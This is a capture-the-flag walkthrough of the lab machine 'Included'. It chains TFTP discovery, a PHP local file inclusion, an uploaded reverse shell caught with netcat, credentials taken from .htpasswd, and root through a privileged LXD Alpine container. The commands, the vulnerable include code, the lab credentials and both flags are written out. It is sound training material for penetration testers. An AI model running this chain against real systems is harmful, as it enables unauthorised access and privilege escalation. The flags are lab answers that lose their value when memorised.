Included

Enumeration is always the key when it comes to penetration testing - the better the enumeration, the better the chances of finding & exploiting vulnerabilities. Most of the times, you won't find the single vulnerability that will grant you access, instead, it will be the chain of misconfiguration that only if used together will let you inside. This machine teaches some more enumeration techniques, even on a different transport layer protocol, and it also teaches that every penetration tester sometimes needs to use Google to see how to perform certain tasks.

4MB

Included_Write_Up.pdf

pdf

TARGET IP --> 10.129.95.185

HOST TUN0 IP --> 10.10.16.64

Task 1: What service is running on the target machine over UDP?

• I first started by trying to run a Nmap scan normally. This uncovered that port 80 was open for TCP traffic.

nmap [Target IP]

• Next, I tried running another Nmap scan utilizing the UDP flag to scan for open UDP ports.

sudo nmap -sU [Target IP]

• Looks like I didn't get anything and it took forever. Don't recommend it.

• It also looks like running this scan is killing my connection to the machine. Do not recommend doing this as I have had to reset the machine a few times.

• Checking the write-up for this machine shows that I was on the right track. However, I have run the UDP nmap scan a few times and it looks like all it does is kill the machine.

  • I went ahead and took what it says that Port 69 is running TFTP (Trivial File Transfer Protocol).

  • I can verify this by running a more targeted nmap scan of the known open port.

sudo nmap -sU -p 69 [Target IP]

Task 2: What class of vulnerability is the webpage that is hosted on port 80 vulnerable to?

• Let's check out the webserver to see what else we can find.

• I'll check out the source code to see what else I can find. I did not find anything relevant in the page source code.

• I checked out Wappalyzer and found the web server is run on Apache and utilizes PHP as the backend. This can be validated by the URL which shows a parameter file=home.php

• The way the URL is set up means there is the possibility to use the exploit Local File Inclusion (LFI). Based on the parameter field, it is calling forward the page home.php but that also means there is the possibility of calling other files.

• I'll try this out using the following URL code in the web browser. I could also use curl from our terminal to access it:

curl http://[Target IP]/?file=/etc/passwd 

http://[Target IP]/?file=/etc/passwd

• It looks like this web server is vulnerable to LFI. If it was set up correctly, it would disallow accessing any files outside of the /var/www/html directory.

• This is allowed because the backend php code that queries the information just pulls the file information.

if ($_GET['file']) {
include($_GET['file']);
} else {
header("Location: http://$_SERVER[HTTP_HOST]/index.php?file=home.php");
}

• If for example, the code specified the directory already, then we would need to adjust our input accordingly.

if ($_GET['file']) {
include( __DIR__ . $_GET['file']);
} else {
header("Location: http://$_SERVER[HTTP_HOST]/index.php?file=home.php");
}

• In this code snippet you can see that a __DIR__ directory is being attached automatically. This means that by plugging our previous file path into the URL would result in /var/www/html/etc/passwd, which does not exist.

  • To bypass this, we would need to do something like ../../../etc/passwd thus allowing us to move out of the current working directory.

• One thing to note is that it looks like there is a user on the system named tftp which we learned from the UDP scan is the service running on Port 69.

Task 3: What is the default system folder that TFTP uses to store files?

• The directory is /var/lib/tftpboot/. A quick Google search gave me this information.

• I can also see this directory listed in the /etc/passwd file at the very end for the user tftp.

Task 4: Which interesting file is located in the web server folder and can be used for Lateral Movement?

• Since we know TFTP is running on port 69 we can connect to it.

tftp -v [Target IP]

• While logged into TFTP, I uploaded a reverse shell in php to the service.

put [File path on host machine] ./[Name of file]

• Next is to start up a netcat listener on your host machine.

nc -lvnp 4444

• On a new terminal window on your host machine, curl the document. Based on /etc/passwd file and googling, we discovered that the typical directory for TFTP is /var/lib/tftpboot, we will assume that is where the reverse shell script was uploaded.

curl http://[Target IP]/?file=/var/lib/tftpboot/[Shell file name]

• After curling the file, it should hang up and you should now have a netcat listener with a shell.

• The first thing I'm going to do is do some exploring.

• In the /var/www/html/ directory I have access to .htpasswd and .htaccess files.

  • I got the credentials for Mike:

    • mike:Sheffield19

Task 5: What is the group that user Mike is a part of and can be exploited for Privilege Escalation?

• The next step is to get an interactive shell with the following:

script /dev/null -c bash

• After that, run the command to switch to Mike

su mike

• Input Mike's password from above and you should now be logged into Mike's account.

• Run the following to see what groups the mike account is part of.

id

• It looks like the account for mike is part of the lxd group.

• The GID 108 and the group name lxd have specific relevance in Linux systems that use LXD (Linux Containers).

  • LXD is a container hypervisor that allows users to create and manage lightweight Linux containers, which are similar to virtual machines but with lower overhead and better performance. When you install LXD on a Linux system, it creates a new group named lxd with GID 108 by default. Users who need to manage LXD containers or have privileged access to LXD-related resources are typically added to this group.

  • The fact that your user mike is a member of the lxd group with GID 108 indicates that your user has some level of access to LXD containers or resources on the system. This may be intentional if you are using LXD, or it may be the result of some default configuration if LXD is installed on your system but you are not actively using it.

Task 6: When using an image to exploit a system via containers, we look for a very small distribution. Our favorite for this task is named after mountains. What is that distribution name?

• We will be using a similar method to the one described in this article for exploiting LXD to escalate our privileges.

• https://www.hackingarticles.in/lxd-privilege-escalation/

• We will also use the following Hacktricks page to utilize this method.

• As part of the escalation we will use the Alpine image which is a lightweight linux distribution.

Task 7: What flag do we set to the container so that it has root privileges on the host system?

• We will first start by installing the Go programming language.

sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools

• Then we have to clone the LXC Distribution Builder and build it.

git clone https://github.com/lxc/distrobuilder

cd distrobuilder

make

• If the above make command produces errors and fails to build the distrobuilder binary, you can also install it via the Snap store, as follows:

sudo apt install snapd

sudo snap install distrobuilder --classic

• After the build is complete let's download the Alpine YAML file and build it.

mkdir -p $HOME/ContainerImages/alpine/

cd $HOME/ContainerImages/alpine/

wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml

sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8

• Once done, the lxd.tar.xz and rootfs.squashfs files should be located in the directory.

• We will now need to use a python web server to transfer these files to the target system.

python3 -m http.server 8000

• Then from the target system, we will download the files.

wget http://[HOST IP]:8000/lxd.tar.xz

wget http://[HOST IP]:8000/rootfs.squashfs

• The next step is to import the image using the LXC CLI

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine

• To verify it was imported:

lxc image list

• The next step is to give the container all of the privileges of the root file system. We will also mount the root file system on the container in the /mnt directory.

lxc init alpine privesc -c security.privileged=true

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

• We should note that the flag to provide root privileges to the image is security.privileged=true.

Task 8: If the root filesystem is mounted at /mnt in the container, where can the root flag be found on the container after the host system is mounted?

• We can now start the container and start a root shell inside it.

lxc start privesc

lxc exec privesc /bin/sh

• To access the root flag we can navigate to the /mnt/root/directory.

Capture User Flag:

• While logged into Mike's account, cat the user.txt file with the following:

cat /home/mike/user.txt

• a56ef91d70cfbf2cdb8f454c006935a1

Capture Root Flag:

• The root flag can be found in /root directory.

cat /root/root.txt

• c693d9c7499d9f572ee375d4c14c7bcf